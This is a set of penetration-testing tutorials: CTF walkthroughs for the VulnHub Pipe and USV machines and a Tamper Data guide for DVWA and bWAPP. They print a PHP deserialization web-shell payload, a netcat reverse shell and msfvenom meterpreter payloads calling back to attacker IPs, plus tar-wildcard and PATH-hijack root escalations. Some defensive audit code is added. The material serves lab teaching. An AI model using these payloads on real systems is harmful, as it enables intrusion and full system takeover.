Hack the Pipe VM (CTF Challenge)


Hello friends, today we are going to solve another CTF challenge, “PIPE”, from the VulnHub labs, designed by Mr. Sagi. The challenge is not too tough and its difficulty level is labelled medium. Solving this lab will give you good penetration testing experience.
You can download it from here: https://www.vulnhub.com/entry/devrandom-pipe,124/
Penetration Methodology:
Network Scanning (Nmap, Netdiscover)
Abusing HTTP service (Burp Suite)

Let’s Begin!!
Start with the netdiscover command to identify the target IP in the local network. In my network 192.168.1.104 is the target IP; yours will differ.
netdiscover




Next, let's enumerate the open ports and service information of the target with the following nmap command:
nmap -p- -A 192.168.1.104 --open
From the result we get open ports 22, 80, 111 and 54073.




Now open the target IP in the browser, since port 80 is open. The website responds with an unauthorized message and a login prompt. The login window reads “the site says: index.php”, which we will use later on.




Now, using Burp Suite, we capture the login request by setting a manual proxy in Firefox. Burp intercepts the request to the login page; here we change the HTTP method from GET to POST.




As shown in the image below, replace GET /index.php with POST /index.php and then forward the intercepted request.




Ok! The above step leads us to a web page that shows a PIPE picture with a “Show artist info” link below it.




Since nothing else is visible on this web page, we open the page source. Its script content references scriptz/php.js, and the scriptz directory turns out to be accessible.




Now open the target IP with /scriptz in the browser and you will notice a couple of files present there. Download both for further enumeration.



First we open the php.js file and find that it serializes some data; then we open log.php.bak, which works together with the JS file and unserializes that data.
I then searched Google and found information on deserialization vulnerabilities.




Now return to the original web page, click the link below the Pipe image and capture that request in Burp.




Select the parameter and send it to the Smart Decoder. In the image below the red highlighted text is decoded and the result is shown in the bottom window; this is the serialized object we need to alter so that we can upload our malicious code.




Now modify the parameter with the following serialized object for remote code execution and then forward the request.
O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:" '; system($_GET['cmd']); echo '
'; ?>";}



Check that shell.php has been uploaded to the accessible scriptz directory.




Now that the shell is uploaded it's time to open it and see what it gives us. Since the code reads the cmd parameter, we pass cmd in the URL as well.

cmd=id

It dumps the id of the current user, i.e. www-data.



Now let's try to spawn a tty shell on the victim's machine with the help of a netcat payload: nc -e /bin/bash 192.168.1.107 1234




Start a netcat listener first, then execute the payload to spawn a shell on the victim's machine.
nc -lvp 1234
As you can observe, we have successfully compromised the target machine. Run the following command to get a proper tty shell; after that we work on gaining root access.
python -c 'import pty; pty.spawn("/bin/sh")'
Then we check for cron jobs on the system with cat, and a couple of them interest us. /etc/crontab runs the script /usr/bin/compress.sh, which is world readable. Now follow the steps below.
cat /etc/crontab
cat /usr/bin/compress.sh




cd /home/rene/backup
ls
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
ls -al /usr/bin/find
touch raj
find raj -exec "/bin/sh" \;
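The privilege escalation above depends on a root cron job running tar against a shell wildcard inside a directory that a low-privileged user can write to, so file names such as --checkpoint=1 are parsed as tar options. As an added example, not from the original writeup, the audit below flags that combination in a crontab and the scripts it calls; the crontab, the contents of /usr/bin/compress.sh and the list of user-writable directories are all constructed, since the page does not reproduce them.

```python
# Added example: audit a system crontab for root jobs whose scripts run tar
# with a bare glob inside a directory an unprivileged user can write to, the
# pattern behind the --checkpoint-action trick above. All inputs are constructed.
import re
import shlex

CRONTAB = """\
SHELL=/bin/sh
17 * * * *  root  cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root  /usr/bin/compress.sh
"""
# Hypothetical contents of compress.sh; the original writeup does not show it.
SCRIPTS = {"/usr/bin/compress.sh": "#!/bin/sh\ncd /home/rene/backup\ntar cfz backup.tar.gz *\n"}
# Directories a non-root user can write to (constructed; os.stat them on a real host).
USER_WRITABLE = {"/home/rene/backup", "/tmp"}
WILDCARD_TOOLS = {"tar", "rsync", "chown", "chmod", "zip", "7z"}


def root_jobs(crontab: str):
    """Yield (schedule, command) for every root entry in a system crontab."""
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        fields = line.split(None, 6)
        if len(fields) == 7 and fields[5] == "root":
            yield " ".join(fields[:5]), fields[6]


def risky_wildcards(script: str):
    """Lines that run a wildcard-sensitive tool on a bare glob after cd'ing into a
    user-writable directory without '--' to end option parsing."""
    cwd, hits = "/", []
    for raw in script.splitlines():
        for cmd in re.split(r"&&|\|\||;", raw):
            argv = shlex.split(cmd, comments=True)
            if argv[:1] == ["cd"] and len(argv) > 1:
                cwd = argv[1]
            elif argv and argv[0] in WILDCARD_TOOLS and cwd in USER_WRITABLE:
                bare_glob = any(a.startswith("*") for a in argv[1:])
                if bare_glob and "--" not in argv:
                    hits.append(raw.strip())
    return hits


def audit(crontab: str = CRONTAB, scripts: dict = SCRIPTS) -> dict:
    """Map each root cron command to the risky lines found in its script."""
    findings = {}
    for _, command in root_jobs(crontab):
        hits = risky_wildcards(scripts.get(shlex.split(command)[0], ""))
        if hits:
            findings[command] = hits
    return findings
```

A script that puts -- before the glob is reported clean; the more robust fix is to avoid globbing in the job entirely and feed tar an explicit list, for example find . -maxdepth 1 -type f -print0 | tar --null -T - -czf backup.tar.gz.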
Yuppie!! We got root access.




At last, open the flag.txt file and we have our flag.
Mission accomplished!


Web Penetration Testing with Tamper Data (Firefox Add-on)

One of the more popular hacker tools for Firefox is an add-on called Tamper Data. Tamper Data isn't a complicated tool; it is merely a proxy, or go-between, that inserts itself between the user and the website or web application they are browsing.

All those GETs and POSTs can be manipulated without the constraints imposed by the user interface seen in the browser.

It allows a person to tamper with the data being sent back and forth between the client and the server. When Tamper Data is started and a web app or website is loaded in Firefox, Tamper Data shows all the fields that allow user input or manipulation.

Hackers can then change a field to an "alternate value" and send the data to the server to see how it reacts.

Installing Tamper Data Add-On


Open the menu at the right end of the Firefox toolbar and click Add-ons.


In the search field, search for the Tamper Data add-on and click Install. After the add-on installs, restart Firefox.


Displaying clear text password in Facebook using Tamper Data

Now I am trying to log in to my Facebook account. When I typed my password I saw it in dotted form, so I wanted to know whether the password I typed was correct. Click on the Tools option in the menu bar and select Tamper Data to capture the request.


A Tamper Data popup opens; click Start Tamper, which starts capturing ongoing requests. As we know, the username and password typed in the fields are sent with the POST method, so now click the Login button to send the data.


When the browser sends the request to the web server a popup appears; hit Tamper, which captures the outgoing request.


As you can see in the given image, the right half of the Tamper popup window shows the email and pass fields in clear text.


HTML Injection - Reflection POST method with Tamper Data

I have installed bWAPP on my WAMP server running on localhost, where it can be accessed through the browser. Navigate to the login page using the URL “localhost/bWAPP/login.php”.

Log in to the web application with bee:bug as the credentials, then choose the bug “HTML Injection - Reflected (POST)” from the given list of bugs and click Hack.


In the given text fields enter first name: kunal and last name: bhal.


Before clicking Go, start Tamper Data again so that we can change the field values; we will see the POST values and modify them to change the name of the user.

Now click Go; a dialog box opens, and here click Tamper to capture the request.


Here you can read the captured request in the given screenshot, which holds the first and last name kunal:bhal.


Tamper Data lets you modify the request sent by any user without his permission, so I am going to change the first and last name given by the user into “first” as first name and “last” as last name, then click OK to forward the request.


Now you can see the request has been forwarded to the web server.


We successfully changed the username of the person; here you can see the username is now “first last”. Similarly, you can use other modules with Tamper Data to exploit bWAPP.


File upload using tamper data
Now open DVWA in your browser at your local IP, 192.168.1.102:81/DVWA, and log in with the following credentials:

Username – admin
Password – password

Click DVWA Security and set the website security level to medium, then select the File Upload vulnerability.
Open a terminal in Kali Linux and create a PHP backdoor with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw

Copy and paste the highlighted code into Leafpad and save it on the desktop as hacked.php.png (the PHP code under a .png name).

Load the Metasploit framework by typing msfconsole and start the multi handler.


Now click the Browse button and select the hacked.php.png file to upload.


Click on the Tools option in the menu bar and select Tamper Data to capture the request.


Before clicking Upload, start Tamper Data again, then click Upload; when the browser sends the request to the web server a popup appears. Hit Tamper, which intercepts the outgoing request.


In the given screenshot you can see Tamper Data has captured the POST request; now copy the selected data from POST DATA.


Paste the POST DATA into a text file to change the extension of our upload. As you can read, the file name is hacked.php.png, but we want to upload a PHP file.


Now change hacked.php.png to hacked.php in the pasted POST DATA, then select and copy the complete data.


Now paste the whole content of the text file into the POST DATA field and click OK.


So here we have forwarded the modified request; now click Stop Tamper.


In the screenshot you can see our PHP file is uploaded in the uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where the file is uploaded and open

http://192.168.1.102:81/DVWA/hackable/uploads/hacked.php in the URL bar to execute it.


You will get the victim's reverse connection in Metasploit.
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

meterpreter > sysinfo

I have got a meterpreter session on the victim PC.
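The tampered request succeeds because the server's decision rests on fields the client controls: the file name and the Content-Type in the multipart body, exactly what Tamper Data lets you edit. As an added, server-side example that is not part of the original article, vet_upload() below judges an upload by its bytes, an extension allowlist and a check for embedded PHP, and stores it under a random name it chooses itself; the two sample uploads are constructed.

```python
# Added example: decide on an upload from the bytes themselves, never from the
# client-supplied file name or Content-Type, which is what Tamper Data edits.
import os
import re
import secrets

MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
PHP_TAG = re.compile(rb"<\?(php|=)")  # inline PHP anywhere in the body (polyglots)


def image_type(data: bytes):
    """Return 'png', 'jpg' or 'gif' from the magic bytes, else None."""
    for ext, magic in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def vet_upload(client_name: str, client_mime: str, data: bytes):
    """Return (accepted, reason, stored_name). client_mime is only echoed in the
    reason for logging; the decision never depends on it."""
    ext = image_type(data)
    if ext is None:
        return False, f"body is not an allowed image (client said {client_mime})", None
    if PHP_TAG.search(data):
        return False, "image carries embedded PHP", None
    client_ext = os.path.splitext(client_name)[1].lstrip(".").lower()
    if client_ext not in (ext, "jpeg" if ext == "jpg" else ext):
        return False, f"name extension .{client_ext} disagrees with content {ext}", None
    stored = f"{secrets.token_hex(8)}.{ext}"  # random name: client never picks the path
    return True, "ok", stored


# Constructed uploads: the tampered request from the article, and a clean image.
TAMPERED = ("hacked.php", "image/png", b"<?php /* payload body */ ?>")
CLEAN = ("photo.png", "image/png", MAGIC["png"] + b"\x00" * 32)
```

Serving the upload directory with script execution disabled is the other half of the fix, since no content check catches every polyglot.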

Hack the USV VM (CTF Challenge)

A new challenge for all of you guys!
This CTF is all about capturing the flags we come across as we go further in our penetration testing of this lab. All the flags are in the form Country name Flag:[md5 hash]. The network interface of this virtual machine takes its IP settings from DHCP.


Let’s get started with our first step.
netdiscover

From this we get our target IP.

Target IP: 192.168.0.103


Now we scan it with nmap, which gives us all the open ports in this lab for further penetration testing.
nmap -p- -A 192.168.0.103
The result shows that the following ports are open: 22, 80, 3129, 3306 and 21211, and an HTTP proxy is running on port 3129.


So now let's proceed with further penetration testing. First we'll go with SSH on port 22.
ssh 192.168.0.103
SSH revealed an ASCII dragon with some strings and a base64 code written at the bottom. Looking closer you'll see AES-ECB written on top.


A Google search turned up a website called aesencryption.net where we can decrypt the base64 code we got in the last step. Decrypting that code with the key given in the image, we arrive at our first flag, i.e. the ITALY FLAG.


Ok, so now let's head towards the second flag. For that we open the target IP in the browser, as port 80 is also open. Look at that: access forbidden. No result.


While opening the target IP in the browser we simultaneously captured the request through Burp Suite, after setting a manual proxy in the browser. When that is done, right-click in the window where the intercepted data is shown; an action list appears, so click Send to Repeater.

Look at the screenshot below: you will find two panels, left and right, for request and response respectively. In the response window the highlighted text is our flag.


As this code is in base64, we use the HackBar plugin in Mozilla Firefox, which is preinstalled or can easily be installed. Whoa, decoding the code in it gives us another flag, our second flag, i.e. the CROATIA FLAG.


Moving ahead, from our nmap result we know an HTTP proxy is listening on port 3129, so we set the browser proxy to the target IP with port 3129 as shown below.


Now try opening the target IP in the browser and wait a few seconds, about 10. The proxy setting did the trick and the website reveals a single page with a banner alternating between “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may already know this; for those who do not, it is Game of Thrones.


The site didn't show much, so I used the nikto scanner through the proxy to get some information about it that will help in further testing.
nikto -h 192.168.0.103 -useproxy http://192.168.0.103:3129
It reveals a WordPress login at /blog.


Ok! Now open it in the browser. Great, the Game of Thrones theme is confirmed, as a Seven Kingdoms blog is shown.
Scrolling down the site you can see an interesting second post that says ‘I have a message for you’. There is a highlighted link, so just try opening it in the browser.


Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.


Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.


Here we decode the code in the HackBar plugin, which gives another flag. From this step we got our third flag, i.e. the PORTUGAL FLAG.


Now, returning to the previous site, there are several posts which are all useless, so just scroll down to see whether there is anything useful; the last post is the one of interest:
‘Protected: the secret chapter’


Oh! We have to provide a password to get through it. This one took some time, and to spare your time I won't go through my failures.
I created a dictionary of possible passwords, which are nothing but some of the words on this page, with the help of the following command:
cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt http://192.168.0.103/blog/


From the list we find that the password is ‘westerosi’.
Using this password we reach another page that reveals another flag as a base64 encoded string, with some images of an actress below it.


Now decode it again, and as a result we have our fourth flag, i.e. the PARAGUAY FLAG.



Moving one level up, the site gives us another message: “the mother_of_dragons has a password which is right in front of your eyes”.
Knowing nothing about the eyes of the actress, I resorted to Google to see whether I could get any clue from there, but no such luck.

I looked at the message again: it states ‘password which is in front of your eyes’.
So the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute, where is this password used?

We have an FTP service running, so let's try to get through it.
ftp 192.168.0.103 21211
ls -al
get .note.txt
exit
cat .note.txt

Bingo! That password is used here. The bottom of the result shows that the children's names are used as a password. Another password, but this time it is for the WordPress login, which we will use in the coming steps.


Again I googled and found out she didn't have any children, but rather three dragons named Drogon, Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.
The list is small, so by entering each one the right password can be found.
The password is RhaegalDrogonViserion.


Apply the credentials to WordPress and we are in!
Looking around the site I found the profile section, which reveals a base64 encoded string for mother_of_dragons.


Like always, decode the base64 code in HackBar and here we have another flag.
This is our fifth flag, i.e. the THAILAND FLAG.


Now with only two flags left, it's time for shell access, as we have WordPress.
Moving further, first make a PHP payload with msfvenom that can be used to get a meterpreter session.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw


Being admin of the site, I am able to edit the theme. So I replaced the 404.php template code in the Viking theme with the highlighted PHP code above.


On the other side, to get the meterpreter session, open a Kali terminal and run the multi handler with the following commands.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
As we have a meterpreter session, now drop to a shell and type the following commands:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cd /srv/http
ls
It shows a reward_flag.txt file, so read it with the cat command:
cat reward_flag.txt
As a result we get a base64 encoded string.


Don't worry, this decoding business is soon going to be over, as this decoding gives us the sixth flag. So our sixth flag is the MONGOLIA FLAG.


Back to another file in the above list, i.e. winterfell_messenger. We see it is executable and owned by root, so run it with the following command:
./winterfell_messenger
cat: /root/message.txt
It shows that it's using the cat command to read a file in the /root directory.
Running strings on it confirms that cat is being called, but without the full path to the program. From this we know it will search the PATH to find cat.


Now we can update PATH using export, but first we need a writable directory, for which we use /tmp. In /tmp we create an executable file named cat so that it is picked up when the winterfell_messenger program calls cat. Since that program runs as root, our file runs as root too, so we make it launch /bin/bash and set its mode. Run the following commands.
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
After this step we update PATH so that our /tmp directory is searched first. For this, type the following command.
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now we go to the home directory of http to get the desired file. For that, type:
cd /srv/http
ls
Now call the winterfell_messenger binary with the given command.
./winterfell_messenger
id
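winterfell_messenger is exploitable because it executes cat by bare name and lets PATH decide which cat that is, while running with root privileges. As an added example that is not part of the original writeup, the Python below reproduces that lookup and lists PATH entries anyone can write to; a throw-away directory layout stands in for /usr/bin and /tmp so it runs offline, and both stub cat files are harmless.

```python
# Added example: reproduce the PATH lookup system()/sh performs for a bare
# command name and list PATH entries any user can write to. The directory
# layout is constructed in a temp dir so the demo runs offline.
import os
import stat
import tempfile


def resolve(cmd: str, path: str):
    """First executable called cmd along path, as the shell would choose it."""
    for d in path.split(":"):
        candidate = os.path.join(d or ".", cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def world_writable_entries(path: str):
    """PATH directories with the other-write bit set (owner/group not checked)."""
    risky = []
    for d in path.split(":"):
        try:
            mode = os.stat(d).st_mode
        except FileNotFoundError:
            continue
        if mode & stat.S_IWOTH:
            risky.append(d)
    return risky


def demo():
    """Build <tmp>/usr/bin/cat and <tmp>/tmp/cat (both harmless stubs), then show
    which one a bare 'cat' resolves to with and without /tmp leading PATH."""
    root = tempfile.mkdtemp()
    sysbin = os.path.join(root, "usr", "bin")
    tmp = os.path.join(root, "tmp")
    os.makedirs(sysbin)
    os.makedirs(tmp)
    os.chmod(tmp, 0o1777)  # world-writable with sticky bit, like a real /tmp
    for p in (os.path.join(sysbin, "cat"), os.path.join(tmp, "cat")):
        with open(p, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, 0o755)
    hijacked = f"{tmp}:{sysbin}"  # what 'export PATH=/tmp:...' produces
    return {
        "safe": resolve("cat", sysbin),
        "hijacked": resolve("cat", hijacked),
        "writable": world_writable_entries(hijacked),
    }
```

The fix belongs in the program: invoke /bin/cat by absolute path, or reset PATH to a fixed value before executing anything, rather than trusting the caller's environment.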


Now go to /root, where we have the .flag.txt file.
Running cat against .flag.txt gives us a congratulations, a wolf made of ASCII characters and a base64 encoded string at the bottom. The commands are given below.
cd /root
/usr/sbin/cat .flag.txt


Finally, decoding in HackBar reveals the seventh and last flag, which is nothing but the SOMALIA FLAG.


Whoola. We reached the end and with this the job is done. Hope you enjoyed it and your penetration testing skills are refreshed.